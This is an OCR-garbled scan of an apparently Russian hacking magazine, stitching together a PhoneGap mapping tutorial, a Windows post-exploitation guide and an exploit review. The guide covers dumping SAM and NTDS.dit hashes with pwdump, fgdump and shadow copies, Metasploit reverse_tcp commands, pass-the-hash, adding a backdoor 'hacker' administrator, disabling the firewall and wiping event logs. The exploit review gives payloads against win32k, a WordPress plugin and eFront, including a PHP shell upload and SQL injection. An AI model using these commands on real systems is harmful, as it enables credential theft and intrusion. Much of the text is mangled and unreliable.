cdiv data-role="page" data-dom-cache="true" class="page-pints" id="points" >
cdiv data-role="header" >
href="#" data-theme="b" data-icon="delete" id= "delete-all" >Ya chl>Toc/hl> href="#index" class="ui-btn-right" data-transition="pop" data-direction="reverse" >
cdiv> cul id="list" data-role="listview" data-inset="true" data-split-icon= "delete" >
c/div>
n nn data-tansition=>>pop>>, data-diection=>>evese>>, .
nn . , .
, API Google Maps, :
var latlng = new gm.Latlng( this .options.lat, this .options.lng);
t his .map = new gm.Map(element, {
});
zoom: this .options.zoom, // center: latlng, // mapTypeid: gm.MapTypeld.ROADMAP, //
disaleDoueClickZoom: true , /1 / disaleOefaultUI: t rue
/1
Gm- n, Google Maps.
. - :
t his .person = new gm.Marker({ map: t his .map, icon: new gm.Markerlmage(PERSON_SPRITE_URL,
new gm.Size(48 , 48 )) });
PERSON_SPRITE_URL n n Ggl -. -maps.gstatic. com/mapfiles/c/mod scout/cb scout spite api OO . png .
, , n, , click:
gm.event.addlistener(this .map, 'click' , f unct i on (event) self.requestMessage( function (err, message) { 11 , ut , if (err) return ; /1
038
EnableViewportScale Externa!Hosts
ltemO ltem 1 ltem 2 ltem 3
MediaPiaybackRequiresUserAction
n ExternaiHosts
// self.addPoint(event. latlng,
00 Boolean NO Array . (41tems) . String csi .gstatic.com String .googleapis.com String maps.goog le.com String maps.gstatic.com Boolean NO
self.options.radius, message); self.updatePointslist(); // q n }); }, false );
n - . n n n
. nn Geolocation AP I !, n n l:
if (navigator.geolocation) { /1 ,
function gpsSuccess(pos) { var lat, lng; if (pos.coords) {
}
lat pos.coords.latitude; lng pos.coords.longitude;
el se lat lng
pos.latitude; pos.longitude;
self.movePerson( new gm.Latlng(lat, lng)); /1
/1 /1 window.setinterval( function () { /1 n n navigator.geolocation.getCurrentPosition(gpsSuccess, $.noop, {
enaeHighAccuracy: true , maximumAge:
}); } , ); }
movePeson n n n getPointslnBoundsll n, n
- . n- n ? HTML5 n
locaiStoage, n !n , l. , n, , !
- , n n . n - n - Safai Chome. ,
n .
, n , , n WebKit . ~ n
n h ~ -n n -
01 / 156/ 2012 www.epidemz.net
iOS
. - (n Denwe XAMPPI, ,
. n , . , , n PhoneGap, , ,
. , i05-. , PhoneGap IDE .
n i05,
n 05 10.6+ ( 05 10.61, Xcode i05 50 . 50 , n Apple . Xcode i05 50 ldeve l ope. app l e . com/devcente/ i os/index.act i on l . ,
4 . , ' Apple ( n , 5t, !. ,
i05 Objective-C. PhoneGap,
PhoneGap i05. lhttps://g ithub .com/callback/phonegap/zipba ll /1.2 .01,
i05 . , Xcode PhoneGap. , IDE -
01/156/2012
PhoneGap: HTML5
. , , n Run- iPhone/iPad PhoneGap. , index.html ,- . ,
n n, n www. ,
PCZONE
i f (button_id === 1) { // self.removePoint(point);
} }, TILE );
, n,- , n i.i n . , n ln , l ,
Ph oneGap:
navigator.geolocation.watchPosition(function (position) { self.movePerson( new gm.LatLng(
position.coords.latitude, position.coords.longitude));
}, fu nction (error) { navigator. notification.alert( 'code: + error.code + '\nmessage: ' + error.message, $.noop, TILE );
} ' { frequency:
}); - , . n Run
, n iS -' nn n .
iPhone, iPod iPad n, n Xcode. n nn n . :1. : n n
PhoneGap, n, n n . .
Appcelerator Titanium lwww. appceleato.com l. Titanium n Andoid iPhone, n lk.
, n n IDE . n Tita-nium n, n
[ $49 ]. $120 . l t Titanium , n 25 . n n n Apache 2.
Corona SDK lwww.anscamoile . com/coona l . n - iOS An-doid. . ,
OpenGL. n , - : $199 n $349 iOS Andoid. n n IDE .
n , JavaScipt.
01.0
~ ~
: 56.84484567007557 ...
: 56.84583899763894 ...
hG-n
n iOS, iOS ! , nn iOS D eve l ope
Pogaml. n n n App le, n
IAndoid, Windows Phonel n . , , n n n n - . n $99
n . Apple , n n . n n
n iOS n Stoe. , $99 n n , n - .
nn n - n iS - ! , n n n : it .l y/tD6xA!I . , n
. . ?
n -n n n n iOS n PhoneGap. n Objective-C,
n n n , n n API PhoneGap. nn n, n An do id Windows Moile 7, , - n n, n ! : phonegap . com/sta t l . n,
n n Ph oneGap, n lphonegap .com/apps]. PhoneGap-
n n n n. n , n n,
. n n, HTML+JS - n n , n n . , Ph one Gap
n Nitoi n l n n GitHub: github .com/ phonegap l. ,
n n Ni toi n Adobe . , nn n n n n ? ::
01 / 156/201 2 www.epidemz.net
. .
www.epidemz.net
PCZONE Ant la.zhukov!Oreal.xakep.rul
WINDOWS-APOE WINDOWS-CCTEM
, , ,
, NTLM. .
.
? , . : S-, LM/NTLM-xe
; LSA, LM/NTLM-xe
, ; , Sh-
, ! , , ! .
, -. : !
, , . 7
.
1 PWDUMP FGDUMP , . NTLM/LM-xe .
, DLL- SeDebugPivilege . ,
la NT AUTHORIY\SYSTEMI . , : ,
! LiveCDI, , -t lwww.piotrbaia .com/all/kon-boot l, .
l NT AUTHORITY\ SYSTEM l, EasyHack . . pwd ump lwww.foofus .net/-fizzgig/pwdumpl fgdump lwww. foofus .net/-fizzgig/fgdumpl.
, . :
pwdump localhost fgdump . exe
. 127.0.0.1.PWDUMP l ! 127.0.0.1 .CACHEDUMP
l ! .
01/156/2012 www.epidemz.net
, , .
, , pwdump, :
> pwdump - mytarget . log -u MYDOMAIN\someuser - \ ' lamepassword' 10 .1.1.1
10.1.1 .1 - , MYDOMAIN\ someuse- , la mepasswod-
, mytaget.log - . pwdump, fgdump , :
> fgdump .exe -f hostfile . txt -u MYDOMAIN\someuser - 10
hostfile.txt- , , - .
, ! !.
, fgdump.exe.
2 VOLUME SHAOOW SERVICE pwdump fgdump , , , . , . ,
SAM, , . , , - SYSTEM . , , - . - , , , . , , , .
, >> , Volume Shadow Sevice ! ! .
Windows S v 2003. , , System State ntbackup
IVolume Shadow f Shaed Foldes l . ,
l , SAM SYSTEMI, .
, Wi ndows , , . , . , -
, . _ LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CuentVesion\ Winlogon\cachedlogonscount 0>>.
, . .
01/156/2012
Widows-apoe
w n n n pwdump
n n n Windows Cedentials Edito (WCEI
, vssown.vbs itools .l anmaste53 . com/vssown .v bs l, . . : cscript vssown. vbs /start.
: cscript vssown.vbs /create. : cscript vssown. vbs /list.
. Device object \\ ?\GLOBALROOT\ Device\HaddiskVolumeShadowCopy14 >> ! 14 - !. . 1. :
\\?\GLOBALROOT \ Device\HarddiskVolume5hadowCopy14\ wi ndows\system32 \ config \ SYSTEM .
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\ windows\system32 \config\SAM .
2. , - SAM inside l i n si d ep o.com/us/saminsi d e.shtm l l
.
_ ! , , ,
! , . ,
SAM SYSTEM. Active Diecto y NTDS.DIT, :
\\?\GLOBALROOT\ Device \ HarddiskVolume5hadowCopy14\ windows\ntds\ntds.dit .
, SYSTEM. , ? SYSTEM NTDS.DIT,
n n ? , , n NTDS.DIT , .
Csaba t , NTDS.DI T .
csa babata.com/down l oads/
www.epidemz.net
PCZONE
ntds dump hash.zip. , . n n BackTack5 !n Linu-],
n . , . libesedb:
cd libesedb chmod + configure ./configure && make
. , :
cd esedbtools . / esedbdumphash .. / .. /ntds .dit
/l ibe sedb/esedbtools/ntds.dit.expot/datatable. . ,
SYSTEM:
cd .. / .. /creddump/ python ./dsdump.py .. /SYSTEM
. /libesedb/esedbtools/ntds.dit.export/datatale
! ! , ! ] . , : python . / dsdumphistory . . . /system .. /libesedb/esedbtools/ntds.dit.export /datatale.
, , ! ] .
' HASHGRAB2+ SAMDUMP2
, . , , LiveCO !, Offline NT Passwod & Registy Edi t o],
- , .
HashGab2l py 1 337 . get- oot . com /too l s/has h gab2 . .!] samsump2 l soucefoge.net/pojec t s/ophcack/f iles/ samdump2/ 2.0.1],
Liv- . HashGab2 Windows-pae, , n samdump2
SAM SYSTEM .
.. - ..... - ... ~"" ... "' 1000 e su~_ . .. s.o 1011.1: O u
meterpreter > set payload widows/meterpreter/reverse_tcp meterpreter > set rhost ( ] meterpreter > set smbpass (
] meterpreter > set smbuser [ ] meterpreter > set lhost [ ] meterpreter > exploit meterpreter > shell -
, , . , . ,
getsystem. , MS09-012, MS10-015 [KiTrapDDI .
6 PASS-THE-HASH NTLM . , . -
:1. - , Pass The Hash, 1997 . Pass-the-Hash Toolkit. [oss. coresecu rity.com/projects/pshtoolkit .htmll: IAM.EXE, WHOSTHERE.
GENHASH.EXE. , GENHASH LM- N- . WHOSTHERE.
, -, .
, : , / NL- . IAM. - , [ , , . .l,
, , .
, NL-, ,
. , , Windows-ccee, ? . ,
? -, .
n n nwn nn . n , , n n ( nmap, - w), .
ipconf ig /all
ipconfig /displaydns
netstat - nabo
netstat -s - [tcpludplicpmlip]
j netstat - : route print
.
D NS-e . . ........................................... -~
/U-. - , , .
' etsta t - [, UDP, ICMP, IPI. : .. j . : .
'''''''f' .,... .... ...................... . . ..... ....... . ..................... . ..................... .
, , 445. j netstat - 1 findstr :445
net view
net user %USERNAME% /domain
j net accounts ... ............................. ..... ................................ .
j .. ~ .et ~.c~~.unts /do~~i~ ............... . ! net localgroup administrators
net localgroup administrators /domain ............ .
!. ".~t .~.~nfig ~o~.~~-t ~ ti~-~ ................. ,.... .. .. . : net share ;, ....
SMB [!.
[ '/domai', l. , , , . .
[ ! .
.
.
>> .
, NetBIOS, , , , . . ....... .... ... .... ............................ ......................... ... .................... .... ....................................................................... .
S - .
~ - R- . . . . . ...... ... ....... ....... .... ... ... ........ ....... ...... ................ ......................... .... . ....................................... ..
: type %WINDIR%\System32\drivers\etc\ j hosts hosts.
www.epidemz.net
whoami
whoami /all
qwinsta
v
set
systeminfo (XP+I
qprocess
n enna - . (n~~ : n ( r ), , , , r nr . .
? . '/all' 510 , 510 , !
? ! .
, , - . R- ! !, .
( uame !, , . . ................ ........... ... .... ... ................... ...... ...... ... .................. . .. ......................................... .
- . SET , : . USERDOMAIN, USERNAME, USERPRO-; FILE, , LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .
; , , , : , , .
~ , . ~ , 10 , PID .
. . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . ................. . ... ~ ............ ~.. .. . . .. . . .. . . . . . .. . . . . . . . . . .. . . . . . '...... . ............ . '............ . .. . . ........ . ......... . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . .. .. .. .. . . . . . . . . . ............. ~
; . ~~~ ~ .................................... J. .. ~~.~~~~ . ~.~~~ .. :~~~~.~., ~~.~~~~.~. ~~~.:' .~.' ......................................................... ! schtasks /query /fo csv /v >
%% ~ csv, .
at
, , , . , SYS-TEM ( Wi7x64l. , , - do_somethig.bat SYSTEM 15:41 , :
at 15 :41 / interactive "d:\pentest\do_somethig.bat" , .
. , ............................................ ; ............................ .. .............. ..
: schtasks (XP+I
net start sc query
sc getkeyname "" sc queryex ""
tasklist (+)
taskkill [/f] /pid
~ , . at, .............. , .: .. ~~.~.~~.~.~~ . ~~.~~~ ~~~~~.~~ .~~~~. ~~~~~~.~~~~ .~~~.~~ .~.~~~ .~.~~.~.~~~ ~ l~~.~~:.~.~.~.~. ~~~ ~ ~ 1 ................. , .... .
key . , PIO .
................. ... ... .......................................................................
j . ......................... . ......................... .
taskkill [/f] /im PIO
.... , ............. ,
.......
! . ~.~~.til ~si n~~ .~r.i~eS. .................... ......... ~.~~.~.~~.~.~~.~:.ll\. ~ ~~~~ l~~ .~.~~~~~.~~~ ~ ~:.~~~~ .. ~:..~~ ~.~~~.~~~.~~~~~. : ............................................... . : gpresult /z : - . ................................... .-.................................................................. ....................................................................................... , ... , ............................................. ........... :
wevtutil el
: wevtutil qe
nor. , noro. n , n .
, (, . . !.
.
: .. ~~~~.~.~i~ c' .. ~.~~.~~.~.~.~~ ........ . ...... . .... ~~~~~~~ ~.~~~~~~' ~~~ ............ ............ ...... ................ ..... ................... ............... ............................................................... . : del %WINDIR%\*.Iog / /s /q /f WINDOWS.
www.epidemz.net
%windir%\System32\cmd.exe / ''%SystemRoot%\syst em32\Dism.
/online /get-features
Windows - n n no n n n. - n - nn.
, . Windows Vista SP1/7/2008/2008R2, no , te lnet ft- ..
................................................................... .
%windir%\System32\cmd.exe / ''%SystemRoot%\system32\Dism.
" /online /enaie-feature 1 featurename:TFTP
Ntsd -server tcp:port=1337 cal.exe Ntsd -remote tcp:server=,port=1337
net use
reg save HKLM\Security security. hive
n TFTP. F- t ftp.exe .
Windows Vista ntsd.exe, system32. . [ ), - .
[ ). , . NTSD Backd oo.
i .
- , n n. n: w , , n,
(n, n n).
~ security . , , system. ..................................................................................... '" "" .. ... .. ....... .. . .................. ................................ ..
.. ~~~ -~-~-~--~~-~-~-~~-~~--~--~. :~ ~~~ ........... ! ... .. ~~--~-~- -~-~-~~~ -~-~~~~-~-~-~-~ - SAM, ~ . ~~~~ - ~:.~~~~--~~ -~--~-~~-~~-~~~-~-~~~ : ............................. .......... .......... . add [\\ etiPaddr\] [Re Do- ! [ TagetiPadd l. 9
. ][\ ] g g : , [ : Oata, maln ~ : REG_BINARY, : fe340eadl . reg export [RegDomain]\[Key] [FileName]
reg import [FileName]
.. ...................... "........... ........ . ........... .. ..
~ n .
.
reg query [\\TargetiPaddr\J [Reg- Domain]\[ ] /v [Valuename!] ; n n .
tree C:\/f /> C:\output_ of_tree.txt
dir \ /s / 1 find /1 "search_string"
, , . w , , : sam_backup.dat? w, ,- , . :
: , .
d i 1\1 1/sl base 1/bl seac h_st i n g, .
www.epidemz.net
CWMIC
, , -WMI (Windows Management lnterfacel. , WI- (WMICI: , , .
~ 1
wmic baseboard get Manufacturer, Model, Product, SeriaiNumber, Version
wmic nicconfig get caption, macaddress, ipaddress, DefaultiPGateway
wmic nicconfig where "IPEnaed = 'TRUE ' and DNSDomain 15 NOT NULL" get DefaultiPGateway, DHCPServe r, DNSDomain, DNSHostName, DNS -ServerSearchOrder, IPAddress, IPSubnet, MACAd-dress, WINSEnaeLMHostsLookup, WINSPrimary-Server, WINSSecondaryServer /format :l ist
wmic printer get Caption, Default, Direct, Descrip-tion, Local, Shared, Sharename, Status
wmic os get bootdevice, caption, csname, current-timezone, installdate, servicepackmajorversion, servicepackminorversion, systemdrive, version, windowsdirectory /format:list
wmic product get Caption, lnstaiiDate, Vendor
wmic path win32_product where "name = ' Soft-ware Update"' call Uninstal
WMI . , W I - lcompu tesystem, bios, ,
, baseboadl n. . .
: , -, I- , .
.
n , .
.
.
: Softwae Update.
, . .
netuserhackerhacker/add
: net localgroup administrators /add hacker . net localgroup administrators hacker /add ; ....................................... .. : net share nothing$=C:\ /grant:hacker,FULL /unlim-: ited ...........................................................
: net user username /active:yes /domain
netsh firewall set opmode disae
wmic product get name /value wmic product where name="XXX" call uninstall/ nointeractive
rundll32.exe user32.dll, LockWorkStation
hacke .
hacke .
: hacke .
- ( , ) , .
Windows.
, - ( , ).
( ) . ; .......................................................................................... : ...................................... .
www.epidemz.net
EASY
JAVA
, Java, , . , Java , Flash, , . ?
, Java , . javateste.og/
vesio.html . ,
. ? ,
- CVE-201 0-4452, . , Metasploit'e:
11 : use exploit/widows/browser/java_codebase_trust
2) : set URIPATH test.php set LPORT 88
3) : Set payload java/ meterpreter/ reverse_tcp
4) : Exploit
tt :]. , Java ? . : -
, J v- .
, , ,
. ? ':] JavaScipt, Jv-,
. , , l defco- r ussia . u/wa ll. t x t ]. SET [Social gi Too lkit].
B ackTack 5 l www.social-e g i ee . og]. SET , . SET :
1) Website Attack Vectos; 2) The Java Applet Attack Method; 3) Web Templates [
Site l ]; 4) Gmail Gmail; 4) lmpotyouown executae,
.
- . , , Java .
, ? ? ? ?:] , , , , . , [ :11, . , - ,
. : SMTP [25/I , Gmail Mail.u.
, , , , , , - . ? 150 . , IP.
lwww. proxy . ru l, , .
. , security. nov. u ,
, , . :1 [ * ], [
l :
pro)(y -25
01/156/ 2012
- . , . - . , ?
[ ). , , - [ www.example.com:25l. , . , nmap . , UOP ICMP, , -. , .
Proxy server
0 Use proxy server for your LAN (These settigs will t apply to dial-up or VPN conections),
Address: ~['iiiiiiiiiiiiiiiiil]l Port: ~ 1 Advaced ... J Bypass proxy server for local addresses
051 www.epidemz.net
1 EASY
REVERSE-POKC
~ , vs. ? , -, [) -
. ? . , vs-
-, WAF SS L- cepepa, , [, ) .
. , [ , - ?). .
vs- - . ?
- . . , X-Fowaded-Fo, , ! , -
, .
lgoo.gi/VObeW). , RFC 2616 1.1, , Fowads . , , TR ACE OPTIONS. - .
HP-traceroute. Squid reverse-npoc Wikipedia.org
reverse proxy
, , , . , GET POST,
. , TTL I- . , - , - taceoute. , R- -, RFC, GET
MaxFowads. ta ceo ut e, , I- . :
HTTP-Traceroute.py -t www.victim.com -m (TRACE/ GET/POST)
- CSRF .r\!
, CSRF [Coss Site Request Fg, ) . , - . , ,
[, ) , [ , ) . ,
, , ,
. , , n JavaSc ipt . ,
- - . . G- : http:// seve.com/change_passwod.php?NP=ew_pass, ew_pass-
, . , L' :
,
052
L LJ
. GET-an poc- . , S?
:
document.passwd.submit();
l XML-anpoca? - XM L-a np oc. :)
document.passwd.submit();
, , . ; ) .
01 /156/2012 www.epidemz.net
EASY
er..i.r.~t
!, , digital foensicsl- , .
, ,-
. , : ; n ;
; DLL- ; ; ; ; Vitual Addess Descipto; ; . .
, , , , . Volatility 19QQ]L Hi5ip l. Python'e Windows ! XPI, , 32- .
, , n . , n .
! !, , n
. , ,
MoonSols Dumplt ihttp://goo.gi/BY1QN J. - : .
. , n , ! ,
USBI. , - ? Volatilit y. , Python'o, stndln- , .
, :
volatility.exe imageinfo -f d: \test .raw
01 /156/2012
---
: imageinfo- ; f d:\te st.aw- . Volatility - . ;l IWinXPSP3x86l, . , ?
- :
volatility pslist -f d:\test.raw --profile=WinXPSPx86
, , :
volatility netscan -f d:\test.raw --profile=WinXPSPx86
- , , , SAM, - LSA?
Windows .
volatility hivelist -f d:\test.raw --profile=WinXPSPx86
hivelist- , .
, :
volatility hashdump -f d:\test.raw --profile=WinXPSPx86 - ls -s exelsese
: hashdump- ; 103560- System; s 180560- SAM.
, . , . , , . Volatility. , ,
.
053 www.epidemz.net
/
-
. , , ,
, , .
051,
[ivinside.iogspot.coml [115612, . , .11
1 n Microsoft Office 2007 Excel.xlb CVSSV2 9.3
111111 111 11 11 11111 1111 111 11 IAV: N/AC :M/AU: N/C:C/J:C/A:C) []] : 5 2011 .
: Aniway, abysssec, sinn, juan vazquez. CVE: CVE-2011-01 05.
n , i Excel.
.
f:J!Iii Excel
, !, ). xl b.
01 / 156/ 201 2 www.epidemz.net
@ start () ; (CLASS SESSION ACTION ) ;
SsessionAction = - Sessi~nAction () ; SselectedDocuments = SsessionAction ->get () ; if( removeTrailingSlash ($sessionAction ->getFolder ()) == getParentPath ($ POST [ ' id ' ])
&& sizeof ($selectedDocLJments )) {
if(($ key = array search (basename ($ POST [ ' id ' ]) , $selected0ocuments )) !== false ) {
}
$selected0ocuments [$key ] = $ POST [ ' value ' ] ; $sessionAction ->set ($selectedDocuments ) ;
baseame ( $ POST [ ' icJ ' ]) . "\n "; displayArray ($selectedDocuments ) ; } elseif( removeTrailingSlash ( $ sessionActio ->getFolder ()) -- removeTrailingSlash ($ POST [ ' id ' ])) {
S sessionActio ->setFolder ( $ POST [ ' id ' ]) ; } writelnfo (ob get l ()) ; ajax _ save _name .php
BIFFB. , . Bl FF- :
BOF = workbook globals Workbook globals
EOF BOF = worksheet
Sheet records EOF BOF = worksheet
Sheet records EOF
:
ID ( ) , sz ( ) (sz )
(ID ] - . . : BOF IBegi Of File] EOF IEd Of Fil e].
BOF, :
BOF , BIFF8 . ~;
2 89 ID 2 01 2 f' 2 2 ***.fcH 4 2 ID 2 4 12 4 Excel,
F-: s - Workbook globals
01 /156/2012
- Visual Basic module 1 - Works heet - Chart
4 - BIFF4 Macro sheet 1 - BIFF4 Workbook globals
BOF 7. , . sub_3 0199E55.
. . , , ,
.
.text:esF8e call su_11
.text:e5F835 cmp , h
.text:e5F838 mov [ebp+var_ED4] , .text:e5F83E jz l_54488 .text:e5F844 call su_11 .text:e5F849 mov , [ebp+var_EDC] .t ext:e5F84F imul , [ebp+var_Fee] . text:e5F856 mov edi, .text:e5F858 mov , [ebp+var_EEe] .text:e5F85E lea , [ ++ ] .text:e5F862 call su_l .text:e5F867 push eFFFFFFFDh . text:e5F869 edx .text : e5F86A sub edx, . text:e5F86C add , edx .text:e5F86E push ; Dst
. text:e5F86F push ; int
.text:e5F87e mov , edi
.text:e5F872 call sub_e199E55
, sub_30199E55 , . , .
055 www.epidemz.net
/
puic static checkFile ($name ) { if ($GLOBALS [ 1 config uration 1 ][ 1 file k list l ] != 11 ) {
$acklist = explode (" , ", $GLOBALS [ 1 configLJration 1 ][ 1 file k list 1 ]); } else {
$ acklist = (); } $ acklist [] = 1 pt1p 1 ; $extension = pathinfo ($name , PATHINFO_EXTENSION ); foreach ( $ acklist as $value ) {
if ($extension == trim (mb str-tolol..rer ($valL1e ))) { throw EfrontFileException (_YOUCANNOTUPLOADFILESWITHTHISEXTENSION .
1 .$extension , EfrontFileException : :FILE IN BLACK LIST );
1- CheckFilell
.text:30199E0 cmp edi, [esp+4+Dst]
.text:30199E4 ja loc_303EE1B7
.text:30199 E A mov , [esp+4+arg_0]
.text:30199EE push
.text:30199E F mov , dword_30F72C0
. text:30199E75 push .text : 30199E7 mov , nNumberOfBytesToRead .text:30199E7C push esi .text:30199E7D mov [esp+l0h+Dst],
. text:30199E93 mov , [esp+l0h+Dst]
.text:30199E97 push esi ; Size
. text:30199E98 lea edx, dword_30FEB8[ebx]
.text :30199E9E push edx ; Src
.text:30199E9F push ; Dst
. text:30199EA0 sub edi, esi
.text :30199EA2 call memcpy
. text:30199EA7 add [esp+lCh+Dst], esi
.text:30199EAB add , esi .text :0199EAD add esp, 0Ch .text:30199EB0 test edi, edi .text : 30199EB2 mov dword_30F72C0, .text:30199EB8 jnz loc_301E0DB
, .
, / GS / SAFESEH . , /GS- MS Visual Studio, , . , ,
. cookie, . 64- , , coo kie. , ,
. - . /SAFESEH S- .
, , n
. , . Visual Studio
/ SAFESEH
056
-. n
, n . , . memcpy, nepen , / GS . ,
esp . , ca ll esp .
i(.1;ldfifi Microsoft Office Excei2007/Microsoft Office Excel2007 SP2 .
,_i,J!IiitJ:I , .
2 MS11-077 Win32k Null Pointer De-reference Vulnerabllity CVSSV2 ~2 111111 111 111 11 11111
1]] : 22011 . : KiDebug. CVE: CVE-2011-1985.
11111 [AVL/AC:L/Au:N/C:C/1 /)
wi n32k.sys , .
>> n.
IJ34!Jii :
.text:BF9140C0 ; _stdcall NtUserfniNCBOXSTRING(x,x,x,x,x,x,x)
.text:BF9140C0 _NtUserfniNCBOXSTRING@28 proc near CODE XREF: xxxDefWindowProc(xJx,x,x)+E [ p
. text:BF9140C0 NtUseressageCall(x,x,x,x,x,x,x)+l[p
.text:BF9140C0
.text :BF9140C0 WND dword ptr 8
. text :BF9140C0 arg_4 dword ptr 0Ch
.text:BF9140C0 arg_8 dword ptr 10h
.text:BF9140C0 arg_C dword ptr 14h
.text:BF9140C0 arg_10 dword ptr 18h
.text:BF9140C0 arg_14 dword ptr lCh
.text:BF9140C0 arg_18 dword ptr 20h
01 /156/2012 www.epidemz.net
RETURIJ t o EXCEL . O II OEE frooo f:L .7
.text:BF914ece
.text:BF914ece mov edi, edi
.text:BF9148C2 push .text:BF914eC mov , esp . text : BF9148CS mov , [ebp+WND)
; WND == exffffffff (-1), .text:BF9148C8 mov , [ecx+2eh ) BSOD
NtUse MessageCall NtUsefniNCBOXSTRING , CB _ADDSTRING:
.text :BF88EE6B ; i nt __ stdcall NtUserMessageCall(int, int, int UnicodeString, PVOID Address, int, int, int)
.text:BF88EEB1
.text:BF88EEB4
.text:BF88EEBB
.text:BF88EEBC
push movzx
push push
[ebp+arg_18) ; int , ds:_MessageTae[eax] int [ebp+arg_le) int
. text: BF88EE BF and , Fh
. text : BF88EEC2 push [ ebp+Address] Address
.text :BF88EECS push [ebp+UnicodeString] ; int
. text: BF 88E EC8 push [ ebp+arg_ 4] ; int
. t ext: BF 88EECB push esi ; int
. text : BF 88E ECC call ds:_gapfnMessageCall[eax*4 ) ; NtUserfniNSTRINGNULL(x,x,x,x,x,x,x)
. rdat a:BF998D68 _gapfnessageCall dd offset _NtUserfnNCDESTROY@28
.rdata :BF998D68 ; DATA XREF: NtUseressageCall(x,x,x,x,x,x,x)
. rdat a :BF99eD68 ; NtUserfnNCDESTROY(x, x,x,x,x,x,x)
.rdata :BF998D6C dd offset _NtUserfnNCDESTROY@28 ; NtUserfnNCDESTROY(x,x,x,x,x, x,x)
.rdata:BF998D7e dd offset _NtUserfniNLPCREATESTRUCT@28 ; NtUserfniNLPCREATESTRUC(x,x,x,x, x,x,x)
. rdat a: BF998DD4 dd offset _NtUserfniNCBOXSTRING@28 ; NtUserfniNCOXSTRING(x,x,x,x,x, x,x)
,
SendMessageCallback((HWND)- l ,CB_ADDSTRING, e, e, e, e);
SendNotifyMessage((HWND)- l ,CB_ADDSTRING, e, e);
01 / 156/201 2
, - BSoD:
CB_ADDSTRING 14 CB_INSERTSTRING 14 CB_FINDSTRING 14
CB_SELECSTRING exe14D CB_FINDSTRINGEXACT 1s LB_ADDSTRING LB_INSERTSTRING 11 LB_SELECTSTRING 1 LB_FINDSTRING exelBF LB_FINDSTRINGEXACT 12 LB_INSERTSTRINGUPPER exelAA LB_INSERTSTRINGLOWER l LB_ADDSTRINGUPPER 1 LB_ADDSTRINGLOWER exelAD
.,.,,Jdjfi Windows SP3/XP SP2 64, Windows 2003 Sv SP21+ itanium,x64l, Windows Vista SP2/ SP2 64 , Windows Sv 2008 SP2 32/64/ itan ium, Windows 7 32/64 , Windows 7 SP1 32/64, Windows Sv 2008 2 x64/i tanium, 2 spl x64/itan ium .
f"jJ!IijiJ:I MSll-077, .
3 Wordpress Zingiri Web Shop Plugin CVSSV2 ~5 11111111 1111 11 11111111 1 1111 111 1
I:N/AC:L/Au:N / C: / 1: P/A:PI l1
WodPe ss . , ,
. - -,-
, . Egidi o Romano aka EgiX . EgiX 13 , , .
IJ:J4!Jii /fws/addons/ t i m e/j sc i t s/t i _ m 1 1 u g i s/ j f i 1 ma g 1 j _ s ave _ name.php, 37-56
. $selectedDocuments POST - value.
$selectedDocuments displayAayll witelnfoll, , $selectedDocuments.
witelnfoll , /fws/addons/ t i m /j s i t s/t i _ m / 1 u g i s/ j f i 1 ma g 1 j _ t _
folde.php:
function writeinfo($data, $die = false) {
$fp = @fopen(dirname( __ FILE __ ) . DIRECTORY_SEPARATOR . 'data.php' , 'w+' );
@fwrite($fp, $data);
057 www.epidemz.net
/
GetUserTimeTargetll
@fwrite($fp, "\n\n" date( 'd/M/Y H:i:s' ) ); @fclose($fp);
! data.php, -. ex pl oit- db .com !EDB-10: 18111]. ,
.
, , :
11 Arch Li nux # pacman -5 php
/ / Debian- based # apt-get install php
:
$ php 18111.php
- , - WodPess. , Joomla!, - CONFIG_SYS_ROOT_PATH.
if1;1d:Jfi Wodpess Zigii Web Shop Plugin 0.9.12 2.2.3.
fil!iijiB' 2.2 .4 .
'
eFront
CVSSV2 ~5 111111 1111 111 11 111111 1111
[AV: N/AC:L/Au: N/C:P/1: /:] IIJj]
EgiX eFont. , , .
f:JQ!Iii 1. .
/www / d i to /t i ny _ m / 1 ug i s/save _ te m 1 te/s ave _ te m 1 te. h ! 8-18]:
058
if ($_POST[ 'templateName' ]) { $dir = ' .. / . / .. / .. /content/editor_templates/' .
$_SESSION[ 's_login' ]; if (!is_dir($dir) && !mkdir($dir, 8755 )) {
throw new Exception(_COULDNOTCREATEDIRECTORY);
$filename = $dir. '/' .$_POST[ 'templateName' ]. '.html' ; $templateContent = $_POST[ 'templateContent' ]; if (file_exists($filename) === false) {
$ok = file_put_contents($filename, $templateContent);
chmod($filename, 8644);
, file_put_ contents() $_POST[ 'templateName' ] $_ POST[ 'templateContent' ] , . ,
, , php, magic_quotes_gpc. , , :
POST /efront/www/editor/tiny_mce/plugins/ save_template/save_template.php /1.1
Host: localhost Content-Length: Content-Type: application/x-www-form-urlencoded Connection: keep-alive templateName=sh.php%ee&templateContent= < ?php evil_code(); ?>
2. . checkFile[], /libaies/filesystem. class.php, 3143-3154
. FileSystemTee::uploadFile!l, , hkFil[]
. , , file_ack_list,
php, php3, jsp, asp, cgi, pl, , , bat.
php.
3. SQL- UPDATE. getUseTimeTaget[], /libaies/ tools.php : .
, package_l , $entity. , /www/
peiod ic_ u pdate.php:
if ($_5ESSION[ 's_login' ]) { $entity = getUserTimeTarget($_GET[ 'HP_REFERER' ]); //$entity = $_5ESSION['s_time_!arget ' ] ; //Update times for this entit y $result = eF_executeNew( "update user_times set time=time+("
. time(). "-timestamp_now),timestamp_now="
. time(). "lr.tlere session _ expired = and session _ custan_ identifier = $_5ESSIDN[ 's_custom_identifier' ]. "' and users_LOGIN = '" . $_SESSION[ 's_login' ]. "' and entity = '" . current($entity). "'and entity_id key($entity). "'" );
01 /156/2012 www.epidemz.net
, $_G[' _REFERER'], getUseTimeTagetl l ,
eF _executeNew ll . ,
SQL- URL :
http:/ / localhost/efront/www/periodic_updater.php? HTTP_REFERER=http://host/?package_ID=[SQL]
$_SERVER('HP _REFER ER '], , -,
. .
4. . /www/index.php:
if (isset($_COOKIE[ 'cookie_login' ]) && isset($_COOKIE[ 'cookie_password ' ]))
try { $user = EfrontUserFactory :: factory(
$_COOKIE[ 'cookie_login ' ]); $user - > login($_COOKIE[ 'cookie_password ' ], true);
$_COOKIE['cookie_login'J. EfontUserFactory::factoyll,
, :
